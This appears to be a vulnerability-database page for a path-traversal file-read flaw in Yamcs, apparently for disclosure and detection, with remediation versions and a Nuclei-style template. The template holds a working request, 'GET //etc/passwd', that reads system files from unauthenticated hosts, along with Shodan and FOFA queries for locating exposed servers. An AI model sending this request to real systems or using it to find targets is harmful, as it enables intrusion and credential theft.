CVE-2026-55552: Yamcs <=5.11.12 - Arbitrary File Read

2026-10-08 PoC Public

Description

Yamcs through 5.11.12 serves static web resources through a handler that resolves the requested path against the configured web root without rejecting absolute paths. A request path that begins with a double slash is resolved as an absolute filesystem path, discarding the web root, and the handler returns the referenced file from the underlying host, letting unauthenticated attackers read any non-hidden file readable by the Yamcs service account whose path contains no dot segment.

PoC

id: CVE-2026-55552

info:
  name: Yamcs <=5.11.12 - Arbitrary File Read
  author: aryu-ru,AbdrrahimDahmani
  severity: high
  description: |
    Yamcs through 5.11.12 serves static web resources through a handler that resolves the requested path against the configured web root without rejecting absolute paths. A request path that begins with a double slash is resolved as an absolute filesystem path, discarding the web root, and the handler returns the referenced file from the underlying host, letting unauthenticated attackers read any non-hidden file readable by the Yamcs service account whose path contains no dot segment.
  impact: |
    Unauthenticated attackers can read arbitrary files from the host running Yamcs, including the shadow password file and the installation secret key stored in yamcs.yaml, potentially leading to full compromise of the mission control system.
  remediation: |
    Update to version 5.11.13, or 5.12.0 or later, which constrain resolved static file paths to the configured static roots.
  reference:
    - https://github.com/yamcs/yamcs/security/advisories/GHSA-9jg3-g3wh-w9pj
    - https://github.com/yamcs/yamcs/commit/f4bc588880c166849e983aa8f65b9c8107d06091
    - https://github.com/yamcs/yamcs/commit/c7dfd24e469ae1086c23e0fe04401cb1ce4260d4
    - https://github.com/yamcs/yamcs/releases/tag/yamcs-5.11.13
    - https://nvd.nist.gov/vuln/detail/CVE-2026-55552
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-55552
    epss-score: 0.01722
    epss-percentile: 0.76784
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    vendor: yamcs
    product: yamcs
    shodan-query: http.html:"Yamcs Mission Control"
    fofa-query: body="Yamcs Mission Control"
  tags: cve,cve2026,yamcs,lfi,traversal,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Yamcs Mission Control")'
        internal: true

  - raw:
      - |
        GET //etc/passwd HTTP/1.1
        Host: {{Hostname}}

    disable-path-automerge: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/octet-stream")'
          - 'regex("root:.*:0:0:", body)'
        condition: and
# digest: 490a0046304402203456a9009db66740c33ed72fc9636dee14bd0bb02f6d9aa48961dc152bc99eae0220261100ebf36a31a0f6efa2531b6d34ddfc8201ebf23a0a45ff9bfe136c5e2bad:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.